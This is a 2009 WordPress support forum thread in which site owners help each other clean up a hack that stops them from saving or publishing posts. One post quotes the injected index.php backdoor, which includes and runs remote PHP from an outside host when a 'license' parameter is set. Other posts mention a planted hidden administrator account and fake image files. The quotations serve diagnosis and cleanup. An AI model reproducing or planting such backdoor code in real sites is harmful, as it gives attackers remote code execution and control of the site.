I can't believe that NO ONE from wordpress has been answering our cries ...
Can't save, edit or publish (75 posts)
-
sidewalklyrics
Posted 6 months ago # -
lockedroomguy
Posted 6 months ago #Sidewalklyrics, if the problem is in fact related to changes made to files on your server, as it was for me and saraking, then it's not a Wordpress problem and they can't really do anything about it.
I'm not saying no one will respond--I really have no idea if they will or not. But I wouldn't count on it, especially since a potential solution has been posted.
If there is a reason my fix won't work for you, you should post the reason specifically so that other people consider the problem "open" and keep looking for other solutions. For anyone looking at all the issues on here, I would expect they're more likely to spend time on problems that no one has offered any answers to. If your problem is actually different from mine, or if my solution won't work, that could leave you out in the cold, so make sure you explain your situation.
(This is why, in my first post, I was reluctant to include too many details about my problem, since I didn't want to "unfocus" the original poster's problem. But after it went on for a while I decided to go for it.)
Having said all that, I agree it would be great if someone (a Wordpress person or anyone smart!) could come up with a theory as to what kind of changes to which files *could* solve this problem without a complete restore. Just to satisfy my curiosity and so I could learn something new that might help in different situations.
-
lachmi
Posted 6 months ago #My hosting provider is Yahoo and they only have a Snapshot Backup option, where files have to be restored from an earlier snapshot one by one. There's no option to restore entire folders. Does anyone have any idea which specific files are problematic and should be restored? Given the large number of blog-related files, it would be incredibly tedious to restore them one by one.
-
horoskopy
Posted 6 months ago #But there is need to find what was changed to prevent future attacks. Restoring old files means restoring wordpress with same vulnerability.
-
Posted 6 months ago #Lachmi, it seems to me that the snapshot backup is better for you in this instance. It means Yahoo is only taking backups of files as they change rather than backing up your whole system every day.
This means they should be able to tell you exactly which files changed most recently and only restore those. And if restoring those solves the problem, that will also tell the rest of us which files caused the issue.
-
Posted 6 months ago #The problem is that ALL the blog files are showing the modified date as today (perhaps because I accessed the blog and the admin features?), so that means that all of them have to be restored.
-
piltdownman
Posted 6 months ago #Indeed. If there is a serious vulnerability, it is the responsibility of WP to identify it as quickly as possible and post a workaround or fix. Since they are so proud of still supporting the early versions of their software, they need to live up to that challenge.
I also had the seotoo injection into my index.php file, but that is the only one I can find with any changes. However, there are several files that look suspect to me. Can anyone clarify if these are supposed to exist or not?
wp-content/index.php.gif
wp-conent/themes/classic_old.php.pngg
wp-admin/import/b2_old.php.pnggPilt
-
Posted 6 months ago #I see.
You might still be able to make it work, because Yahoo takes snapshots every four hours and keeps them for four weeks. So you could restore the second-newest snapshot, or third-newest, and see which were changed there.
http://help.yahoo.com/l/us/yahoo/smallbusiness/webhosting/backup/backup-06.html
-
Posted 6 months ago #Piltdownman, I have another Wordpress install that has not been compromised and it does not have those files. I'm running 2.2.1. (In my admittedly non-expert opinion, they don't look dangerous to me. The .gif shouldn't be dangerous, and although I haven't seen .pngg files before I'm guessing they're just renamed .png (image) files.)
I would love to see an answer from Wordpress here too.
But if we are all having this problem because someone logged on to our servers and changed the perfectly good software we got from Wordpress, then it's not a Wordpress vulnerability. There are problably dozens of ways someone could create a problem if they have access to your Wordpress files.
Of course your issue may be different from mine and may actually be a Wordpress bug. But if your symptoms are the same as others' on this thread--Saves were working fine for a while and then suddenly not working--it's hard to see how it could be a bug. That's why they often recommend an upgrade for this kind of problem--it gets rid of anything not in their default install, and eliminates the possiblity of something you, or I, or a hacker, changed in their working code.
In my case a restore of the backup accompished a similar thing--got rid of possible unauthorized changes but without me having to go through the pain of an upgrade.
And if there's a vulnerability issue then it's with the server host, not Wordpress.
-
Posted 6 months ago #Quick question: what is the name of the actual database of blog posts and comments and in which folder would it typically be located?
-
Posted 6 months ago #Lachmi -
All that info is in the database, not in any of the folders/directories in your public_html space. The database would have been named by you or whoever set up the site in the first place.
I access mine my using phpMyAdmin, which is available as a WP plugin.
Locked -
As to the semantics of whether it's a bug or a security hole or vulnerability, I don't care. I just know that when hackers find a way in, whether they are doing it manually or via a bot, then the people who designed the software should respond; quickly.
Pilt
-
Posted 6 months ago #I totally understand the "I don't care what you call it, I just need it fixed" idea. I would just add one thing to what you said:
I just know that when hackers find a way in, whether they are doing it manually or via a bot, then the people who designed the software should respond; quickly, if the bug or security hole or vulnerability is their fault.
This is where the semantics actually make a difference, because in this case, it is certainly not a bug, because those of us with the problem had working systems for months. It appears to be that something was changed by someone.
Now the hole or vulnerability that allowed this change could be Wordpress's fault, or it could be a hole in the access to your/my server, which would not be their fault, nor could they do anything about it. And since it's a new problem with an old version of the software, it's just as likely to be an issue with the server access than Wordpress. (Otherwise Wordpress users would have been having this problem for years. It's also possible that there has recently been a linux or apache patch that has allowed some unauthorized access via the server, instead of via Wordpress.)
And, in general, if you expect someone who gave you free software to fix something for you for free, in the timeframe that you find acceptable, you might be doomed to disappointment. Especially when they have already acknowledged that they can't promise that, which is why this forum is here. They neither imply nor promise that they will solve every problem, or solve ANY problem within a particular amount of time.
You need to pay for that kind of service.
That doesn't stop me from agreeing with you that I wish someone would come on here with a better idea than restoring all your files...
-
Posted 6 months ago #OK. I give up :-)
I was able to get my site back up and running. One thing that helped was the advice I found here:
http://www.getrichslowly.org/blog/2008/06/08/patching-the-wordpress-anyresultsnet-hack
This was from a year ago, but it appears that a similar attack disabled my site and caused me problems in posting. I could be the same for others....
I did not find all of the same problems noted in the above post (in particular, the RSS code in the database did not match up, so I left it alone) but a lot of it was similar.
I do think that several of those "supposed" pngs and jpegs were suspect, so I commented them out. I also found a couple of files in my uploads folder (the names started with "up....." that would not open in Photoshop -- so I figured they were not real jpegs...and I deleted them.
People will have to get into their databases to fix things up, so if you are unsure how to use phpMyAdmin, you should read up. It is a plugin you can download, but I know it can be daunting for less-experienced users...
Hope this helps someone!
Pilt
-
kaylee
Posted 6 months ago #I don't know if this is allowed on here but I'm a freelancer that works primarily with wordpress. If you don't feel like dealing with the hassle of upgrading, email me and I'll upgrade you for a reasonable rate.
info at klcreativedesign.com
Thanks!
Kristy Lee
-
Posted 6 months ago #I painstakingly restored most of the files to an earlier snapshot captured in Yahoo (web hosting), but it still doesn't work. Does anyone have other suggestions apart from this?
Can anyone from WordPress please step in?
-
Hfort
Posted 6 months ago #I was recently contacted through elance to solve this problem by (SJDankoSF); have not contacted him yet but I will. I went trough your posts and now I am definitely sure all of you got hacked.
@Landykos who posted this code `<?php if(md5($_COOKIE['12942fc392b445f9'])=="695d55c75600f74e94cdded60b2711d0"){ exit; } ?><?php
/* Short and sweet */
if (isset($_GET['license'])) {
@include('http://seotoos.com/license.txt');
} else {
define('WP_USE_THEMES', true);
if (isset($_GET['license'])) {
@include('http://seotoos.com/license.txt');
} else {
require('./wp-blog-header.php');
}
}
?>
` This is a Trojan horse insertion, and probably all of you will find some type of similar code inserted in your files. usually all index.php, config.php and other files.@Lockedroomguy you found the same code on your index page and after deleting it didn't solve it because this type of code it is usually inserted in more than 5 files.
If it doesn't work after backup restoration, that is because your database it is infected as well. Remember that wp-config.php file contains the DB login/pass. That means the hacker has it as well. Case @lachmi
For the ones that got fixed, restoring will not be the solution if you are using an outdated version and have not changed all of your logins. (hosting/fps/DBs). They will insert the Trojan again.
Yahoo does not upgrade older WP versions to the newest one automatically. That has to be done manually.
Take care.
-
atomicskate
Posted 6 months ago #Maybe my post won't help, but...
Same issue. Never modified theme or any file since 2 years.
Just to specify that I have another hosting provider.I follow the advices on http://www.getrichslowly.org/blog/2008/06/08/patching-the-wordpress-anyresultsnet-hack/
I inspected all the files and database tables/rows as specified, and the only things I found are:
- in wp_users table: nameless user created at 00:00:00 on 0000-00-00. Name: Google. I've deleted it.
- in wp_usermeta table: corresponding userid had the rows:
wp_capabilities a:1:{s:13:"administrator";b:1;}
wp_user_level 10
first_name ...
I've deleted it as wellThen I replace the index.php file (http://seotoos.com/) by my back-up one.
But I still have the same issue (ie Can't save, edit or publish)
FYI, I've make a search for any file modified around in May 2009, and except the index.php, nothing has been modified
So, it means that the problem is in my database... -
Posted 6 months ago #I found the exact same entries in the wp_users and wp_usermeta tables. Apart from deleting these entries, any idea what other tables to fix/repair?
-
rlewis
Posted 6 months ago #This is getting serious, folks.
Bleary-eyed from lack of sleep about this problem, I stumbled downstairs for my coffee and checked my email as I did so. A certain "Kathy Bates" berated me for my blog being all screwed up. You have to understand, my blog is fairly obscure, since I am still a fairly obscure YA writer, still pre-famous and pre-rich (as I keep telling my daughter, who wonders when I'll be on TV and buy her the iPhone she wants). I emailed her back
saying I was working to resolve the problem and begged for her understanding.This morning, issue still unresolved, I get a phone call. Kathy Bates on the line. She said that if I didn't get my blog up and running to standard, she would make a special trip to Bali (this is where I live, in Paradise, but we still have our fleas and bugs here).
Look. I started blogging to make friends and fans. Not to attract psychos because my frickin' blog is having some problems.
I and my family are moving to an undisclosed location until this is resolved.
-
RJJNYC
Posted 6 months ago #I just discovered the same problem yesterday, have Wordpress hosted by Yahoo small business (who I've also emailed), I can't even change my password or profile!!
Hello, Wordpress people? Even if you would be kind enough to tell us that you don't know what's going on, that would be helpful...
-
Posted 6 months ago #To be fair to WordPress, if this is an upgrade issue (as the parallel thread on the same topic suggests), then it's Yahoo Web Hosting that's at fault in my case. They claim to have an "automatic upgrade" option, yet the "blog manager" section of the site states:
Blog type: WordPress
Version: 2.0.2When the current version is 2.7.1.
-
WordPress is FREE software. When you make a request for help here, no-one is being paid to help, or to answer you. Any help you do get here will come from another WordPress user, not anyone from automattic.com or wordpress.com - although the former do offer paid support.
-
choplin
Posted 6 months ago #My hosting has restored a backup from one day before the "attack" and now it works fine... but i'm afraid...
-
Posted 6 months ago #Thanks for the clarification, and apologies to all the volunteers at WordPress.
-
Posted 6 months ago #To those of you are still struggling, you have to also look for any of these pesky "fake" jpeg and png files that are scattered about. Delete them or change their names (if you're afraid you might change one you really need...and you can then rename it back...)
I also altered my personal login info, so that it would be rewritten.
I was changing and chasing down a lot of files, so you'll almost have to go through things folder by folder. Oh, and as I mentioned above, check your Uploads folder (or the only you use for that purpose, if you renamed it) for anything that looks suspicious.
If you use the information at the "getrichslowly" blog (posted above a couple of times) you'll have a start on this. I does demand using phpMyAdmin to access and alter your database. If you don't know what you're doing in there, you may want to find a person who does....
Good luck.
Pilt
-
Posted 6 months ago #I can unlock my doors and return to disclosed locations.
My hosting people graciously solved this problem for me.
It was in the wp-plugins. Don't know which one since I backed up and deleted all the plugin folders all from the server, but the blog works fine now. I think it was one of the antispam plugins. Today I backfill the wp-plugins and try them out one by one.
-
webmomster
Posted 6 months ago #I, too, discovered 5/22 that I could not update my blog. My host is BlueHost, and I also had the "seotoos.com" hack. Turns out that 3 files were hacked on May 18, 2009 @ 4:24PM. My index.php (like everyone else's); then in the plugins folder, both akismet and hello (the "hello dolly" WordPress plugin) both had versions with a ".new" extension. I replaced the index.php with a copy I had from 6/21/2008 on my computer and deleted the akismet.new and hello.new from the plugins folder (in the wp-content folder).
For now, my blog *appears* to be operating OK (until the next hack). In the meantime, I'm going to go back in and change my passwords...
-
adrianfoden
Posted 6 months ago #Ahhh... same problem for me. A blog user of mine reported on May 20th that they were being prompted to register so that they could comment. I knew we'd not chanegd it (only two people have admin capabilities on my blog) so I was a little suspicious.
I come to post a quick update this afternoon and I cant post/edit sucessfully - did a google and landed here
I'm on a very old (2.0.1) version of wordpress and have never updated because... well... never really had to. This is the first time I've ever suffered any problems or lost any functionality.
So, i'll replace the old index php and anything else that has been modified and manually clean the entries form the database.. my question then is... would the latest version (2.7?) have been immune to this inject/attack?
-
PerlaAdams
Posted 6 months ago #Hello:
I have the same syntoms of all of you.
I did post on May 18th early in the morning, but I can see that there were changes in my files made the same day late in the afternoon ( my index.php have the "soetoos" stuff).
My webhosting is yahoo, I contected them, they told me that they do not support wordpress and that I must contact direct to wordpress. So, I come here and read all this information.
I contact yahoo back and told them about the hacker files, Now they are trying to fix the problem, I hope they find a solution.
Thank you for all the post, very useful
Blessings
-
salsa_81
Posted 6 months ago #test
« Previous 1 2 3 Next »
Reply »
You must log in to post.
